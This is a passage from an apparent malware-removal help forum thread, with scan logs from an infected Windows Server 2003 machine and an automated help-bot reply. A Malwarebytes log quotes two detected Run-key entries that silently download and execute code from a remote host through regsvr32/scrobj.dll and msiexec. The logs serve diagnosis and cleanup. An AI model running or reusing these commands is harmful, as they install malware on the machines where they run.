mbar-log-2017-05-18 (20-50-07).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 302666
Time elapsed: 23 minute(s), 15 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 0
(No malicious items detected)
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 2
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start (Trojan.Agent.Generic) -> Data: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll -> Delete on reboot. [bc419980773263d3f3e38dbcd729c937]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start1 (Trojan.Agent.Generic) -> Data: msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q -> Delete on reboot. [ad509a7ff8b1f83e1fbdb3a1ff01837d]
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 0
(No malicious items detected)
Files Detected: 1
C:\WINDOWS\UpdateInstaller.exe (Trojan.Reconyc) -> Delete on reboot. [ea1320f907a2e0561a1d6c7288796799]
Physical Sectors Detected: 0
(No malicious items detected)
(end)


- Malwarebytes AntiRootkit first log file:

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
Database version:
  main:    v2014.11.18.05
  rootkit: v2014.11.12.01
Windows Server 2003 Service Pack 2 x64 NTFS
Internet Explorer 8.0.6001.18702
5/15/2017 2:23:15 PM
mbar-log-2017-05-15 (14-23-15).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 458498
Time elapsed: 39 minute(s), 31 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 1
C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME%\vndtf.cc3 (Trojan.ServiceHijacker) -> Delete on reboot. [ab92053895e7f343c6af1bf6c14410f0]
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 0
(No malicious items detected)
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 1
C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME% (Trojan.ServiceHijacker) -> Delete on reboot. [fd40c07d225a89ad2b5197617d858a76]
Files Detected: 4
C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME%\vndtf.cc3 (Trojan.ServiceHijacker) -> Delete on reboot. [ab92053895e7f343c6af1bf6c14410f0]
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\MP8TI1WV\888[1].exe (Malware.Gen) -> Delete on reboot. [f548c17ce597c472130cf174dd238080]
C:\Documents and Settings\Administrator.ART\Desktop\explorer.exe (Heuristics.Reserved.Word.Exploit) -> Delete on reboot. [1f1eca73c3b9a6907104cf7fdb2a52ae]
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\SBKBOT8L\svchost[1].exe (Heuristics.Reserved.Word.Exploit) -> Delete on reboot. [2d105fdeaad291a57807f45ae32204fc]
Physical Sectors Detected: 0
(No malicious items detected)
(end)


- HijackThis report:

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 3:55:38 PM, on 5/15/2017
Platform: Windows 2003 SP2 (WinNT 5.02.3790)
MSIE: Internet Explorer v8.00 (8.00.6001.23707)

Boot mode: Normal
Running processes:
C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe
C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe
C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\AgPkiMon.exe
C:\WINDOWS\SysWOW64\ctfmon.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = res://shdoclc.dll/softAdmin.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.chrome.com/
F2 - REG:system.ini: UserInit=userinit,
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'Default user')
O15 - ESC Trusted Zone: http://www.bing.com
O15 - ESC Trusted Zone: http://runonce.msn.com
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\SysWOW64\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\SysWOW64\browseui.dll
O23 - Service: CA ARCserve Discovery Service (CASDiscovery) - CA - C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe
O23 - Service: CA ARCserve Universal Agent (CASUniversalAgent) - CA - C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\UnivAgent.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - Unknown owner - C:\WINDOWS\System32\dmadmin.exe (file missing)
O23 - Service: Event Log (Eventlog) - Unknown owner - C:\WINDOWS\system32\services.exe (file missing)
O23 - Service: HTTP SSL (HTTPFilter) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: Intel® PROSet Monitoring Service - Unknown owner - C:\WINDOWS\system32\IProsetMonitor.exe (file missing)
O23 - Service: Distributed Transaction Coordinator (MSDTC) - Unknown owner - C:\WINDOWS\system32\msdtc.exe (file missing)
O23 - Service: Net Logon (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: NT LM Security Support Provider (NtLmSsp) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: CA Backup Agent for Open Files (OpenFileAgent) - CA - C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe
O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\WINDOWS\system32\services.exe (file missing)
O23 - Service: IPSEC Services (PolicyAgent) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Protected Storage (ProtectedStorage) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Remote Desktop Help Session Manager (RDSessMgr) - Unknown owner - C:\WINDOWS\system32\sessmgr.exe (file missing)
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Riverbed Technology, Inc. - C:\Program Files (x86)\WinPcap\rpcapd.exe
O23 - Service: Security Accounts Manager (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Volume Shadow Copy (VSS) - Unknown owner - C:\WINDOWS\System32\vssvc.exe (file missing)
O23 - Service: WMI Performance Adapter (WmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\wmiapsrv.exe (file missing)
--
End of file - 6755 bytes

aswMBR report:

aswMBR version 1.0.1.2252 Copyright© 2014 AVAST Software
Run date: 2017-05-15 20:39:23
-----------------------------
20:39:23.974    OS Version: Windows x64 5.2.3790 Service Pack 2
20:39:23.974    Number of processors: 4 586 0x1706
20:39:23.990    ComputerName: *** UserName: ***
20:39:24.959    Initialize success
20:39:25.006    VM: initialized successfully
20:39:25.021    VM: Intel CPU BiosDisabled
20:39:34.162    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3
20:39:34.162    Disk 0 Vendor: WDC_WD1500ADFD-00NLR5 21.07QR5 Size: 143089MB BusType: 3
20:39:34.240    Disk 0 MBR read successfully
20:39:34.240    Disk 0 MBR scan
20:39:34.240    Disk 0 Windows XP default MBR code
20:39:34.240    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS       143078 MB offset 63
20:39:34.287    Disk 0 scanning C:\WINDOWS\system32\drivers
20:39:37.474    Service scanning
20:39:48.349    Modules scanning
20:39:48.349    Disk 0 trace - called modules:
20:39:48.349    ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys atapi.sys pciide.sys PCIIDEX.SYS hal.dll
20:39:48.349    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffadf9bf3c060]
20:39:48.364    3 CLASSPNP.SYS[fffffadf8fc218c9] -> nt!IofCallDriver -> \Device\00000064[0xfffffadf9bf2ba00]
20:39:48.364    5 ACPI.sys[fffffadf8fd93e69] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-3[0xfffffadf9c9c6060]
20:39:48.364    Disk 0 statistics 41715/0/0 @ 6.49 MB/s
20:39:48.380    Scan finished successfully
20:40:13.973    Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Administrator.***\Desktop\MBR.dat"
20:40:13.973    The log file has been saved successfully to "C:\Documents and Settings\Administrator.***\Desktop\aswMBR.txt"

JRT removal tool: Tool didn't detect anything.

RKill:

Rkill 2.8.4 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html
Program started at: 05/15/2017 07:58:18 PM in x64 mode.
Windows Version: Microsoft Windows Server 2003 Service Pack 2
Checking for Windows services to stop:
 * No malware services found to stop.
Checking for processes to terminate:
 * No malware processes found to kill.
Checking Registry for malware related settings:
 * No issues found in the Registry.
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
Performing miscellaneous checks:
 * Windows Firewall Disabled
   [HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
   "EnableFirewall" = dword:00000000
 * Windows Firewall Disabled
   [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
   "EnableFirewall" = dword:00000000
Checking Windows Service Integrity:
 * No issues found.
Searching for Missing Digital Signatures:
 * No issues found.
Checking HOSTS File:
 * HOSTS file entries found:
  127.0.0.1       localhost
Program finished at: 05/15/2017 08:03:14 PM
Execution time: 0 hours(s), 4 minute(s), and 56 seconds(s)

OTL Extras:

OTL Extras logfile created on: 5/15/2017 5:01:52 PM - Run 1
OTL by OldTimer - Version 3.2.69.0    
64bit-Windows Server 2003 Standard Edition Service Pack 2 (Version = 5.2.3790) - Type = NTServer
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.99 Gb Total Physical Memory | 1.76 Gb Available Physical Memory | 43.96% Memory free
5.73 Gb Paging File | 3.47 Gb Available in Paging File | 60.48% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]
 
 
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.inf [@ = inffile] -- %SystemRoot%\System32\NOTEPAD.EXE %1
.ini [@ = inifile] -- %SystemRoot%\System32\NOTEPAD.EXE %1
.js [@ = JSFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.jse [@ = JSEFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.txt [@ = txtfile] -- %SystemRoot%\system32\NOTEPAD.EXE %1
.vbe [@ = VBEFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.vbs [@ = VBSFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.wsf [@ = WSFFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.wsh [@ = WSHFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1
batfile [open] -- "%1" %*
batfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1
cmdfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1
cmdfile [open] -- "%1" %*
cmdfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
htmlfile [edit] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1
inffile [open] -- %SystemRoot%\System32\NOTEPAD.EXE %1
inffile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1
inifile [open] -- %SystemRoot%\System32\NOTEPAD.EXE %1
inifile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1
InternetShortcut [print] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\mshtml.dll",PrintHTML "%1"
jsfile [edit] -- %SystemRoot%\System32\Notepad.exe %1
jsfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
jsfile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
jsefile [edit] -- %SystemRoot%\System32\Notepad.exe %1
jsefile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
jsefile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
piffile [open] -- "%1" %*
regfile [edit] -- %SystemRoot%\system32\NOTEPAD.EXE %1
regfile [merge] -- Reg Error: Key error.
regfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1
txtfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1
txtfile [printto] -- %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4"
vbefile [edit] -- %SystemRoot%\System32\Notepad.exe %1
vbefile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
vbefile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
vbsfile [edit] -- %SystemRoot%\System32\Notepad.exe %1
vbsfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
vbsfile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
wsffile [edit] -- %SystemRoot%\System32\Notepad.exe %1
wsffile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
wsffile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
wshfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
htmlfile [edit] -- Reg Error: Key error.
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
========== Firewall Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
"EnableFirewall" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"9089:TCP" = 9089:TCP:*:Enabled:VMware vCenter Converter Standalone - Agent
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"C:\WINDOWS\SysWOW64\rundll32.exe" = C:\WINDOWS\SysWOW64\rundll32.exe:*:Enabled:rundll32 -- (Microsoft Corporation)
"C:\WINDOWS\SysWOW64\rundll32.exe" = C:\WINDOWS\SysWOW64\rundll32.exe:*:Enabled:rundll32 -- (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{3C28BFD4-90C7-3138-87EF-418DC16E9598}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.51106
"{54F2237F-018C-483B-8884-9FC0D88840C3}" = VC_CRT_x64
"{5AF4E09F-5C9B-3AAF-B731-544D3DC821DD}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.51106
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{CAABD00D-1FA6-48CD-AD28-75BABE0522AE}" = CA ARCserve Backup Client Agent for Windows
"{CAABD4AD-A551-4AA4-82ED-87247EB7DD72}" = CA ARCserve Universal Agent
"{CAABDD41-1935-4C04-AE4B-803EF455E1A3}" = CA ARCserve Backup Agent for Open Files for Windows
"{FCF3ECF7-7AE0-4E26-B387-09A3A80B79CC}" = Intel® Network Connections 18.3.62.0
"ie8" = Windows Internet Explorer 8
"WinRAR archiver" = WinRAR 5.21 (64-bit)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{2BCC4907-4205-4338-BDA5-94F183144C35}" = VMware vCenter Converter Standalone
"{6C772996-BFF3-3C8C-860B-B3D48FF05D65}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.51106
"{6e8f74e0-43bd-4dce-8477-6ff6828acc07}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{8e70e4e1-06d7-470b-9f74-a51bef21088e}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{CAABD0BC-0C3F-4E38-AF09-2300389691FF}" = CA ARCserve Backup Setup Support Files
"{CAABDC77-9350-47CF-ADC1-682C60F70E2E}" = CA ARCserve Discovery Service
"{E824E81C-80A4-3DFF-B5F9-4842A9FF5F7F}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.51106
"CA ARCserve Backup" = CA ARCserve Backup
"Notepad++" = Notepad++
"WinPcapInst" = WinPcap 4.1.3
"Wireshark" = Wireshark 1.12.2 (64-bit)
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 5/15/2017 6:48:15 PM | Computer Name = *** | Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: This network connection does not exist. 
 
Error - 5/15/2017 6:48:45 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
Error - 5/15/2017 6:49:00 PM | Computer Name = ***| Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: This operation returned because the timeout period expired. 
 
Error - 5/15/2017 7:04:25 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
Error - 5/15/2017 7:04:40 PM | Computer Name = ***| Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: This operation returned because the timeout period expired. 
 
Error - 5/15/2017 7:05:25 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
Error - 5/15/2017 7:05:25 PM | Computer Name = IVR02 | Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: The specified server cannot perform the requested operation. 
 
Error - 5/15/2017 7:48:18 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
Error - 5/15/2017 7:48:33 PM | Computer Name = ***| Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: This operation returned because the timeout period expired. 
 
Error - 5/15/2017 7:49:03 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
[ System Events ]
Error - 5/15/2017 1:46:58 PM | Computer Name = ***| Source = Application Popup | ID = 1060
Description = \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys has been blocked
 from loading due to incompatibility with this system. Please contact your software
vendor
 for a compatible version of the driver.
 
Error - 5/15/2017 1:48:17 PM | Computer Name = IVR02 | Source = Service Control Manager | ID = 7023
Description = The Windows Management Instrumentation Driver Service service terminated
 with the following error:   %%127
 
Error - 5/15/2017 5:22:20 PM | Computer Name = ***| Source = Application Popup | ID = 1060
Description = \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys has been blocked
 from loading due to incompatibility with this system. Please contact your software
vendor
 for a compatible version of the driver.
 
Error - 5/15/2017 5:22:20 PM | Computer Name = ***| Source = Service Control Manager | ID = 7000
Description = The mbamchameleon service failed to start due to the following error:
   %%1275
 
Error - 5/15/2017 6:06:06 PM | Computer Name = ***| Source = Application Popup | ID = 1060
Description = \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys has been blocked
 from loading due to incompatibility with this system. Please contact your software
vendor
 for a compatible version of the driver.
 
Error - 5/15/2017 6:07:27 PM | Computer Name = ***| Source = Service Control Manager | ID = 7023
Description = The Windows Management Instrumentation Driver Service service terminated
 with the following error:   %%127
 
Error - 5/15/2017 6:07:27 PM | Computer Name = ***| Source = Service Control Manager | ID = 7023
Description = The nimnkjwe service terminated with the following error:   %%126
 
Error - 5/15/2017 6:07:27 PM | Computer Name = ***| Source = Service Control Manager | ID = 7026
Description = The following boot-start or system-start driver(s) failed to load:
   crcdisk
 
Error - 5/15/2017 6:11:55 PM | Computer Name = ***| Source = Application Popup | ID = 1060
Description = \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys has been blocked
 from loading due to incompatibility with this system. Please contact your software
vendor
 for a compatible version of the driver.
 
Error - 5/15/2017 6:11:55 PM | Computer Name = ***| Source = Service Control Manager | ID = 7000
Description = The mbamchameleon service failed to start due to the following error:
   %%1275
 
 
< End of report >

Edited by jtcote, 19 May 2017 - 10:30 AM.


#4 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,578 posts
  • Gender:Male

Posted 23 May 2017 - 06:40 PM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> https://www.bleepingcomputer.com/logreply/647071 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new FRST log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download FRST by Farbar from the following link if you no longer have it available and save it to your desktop.

    FRST Download Link

  • When you go to the above page, there will be 32-bit and 64-bit downloads available. Please click on the appropriate one for your version of Windows. If you are unsure as to whether your Windows is 32-bit or 64-bit, please see this tutorial.
  • Double click on the FRST icon and allow it to run.
  • Agree to the usage agreement and FRST will open. Do not make any changes and click on the Scan button.
  • Notepad will open with the results.
  • Post the new logs as explained in the prep guide.
  • Close the program window, and delete the program from your desktop.


As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#5 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
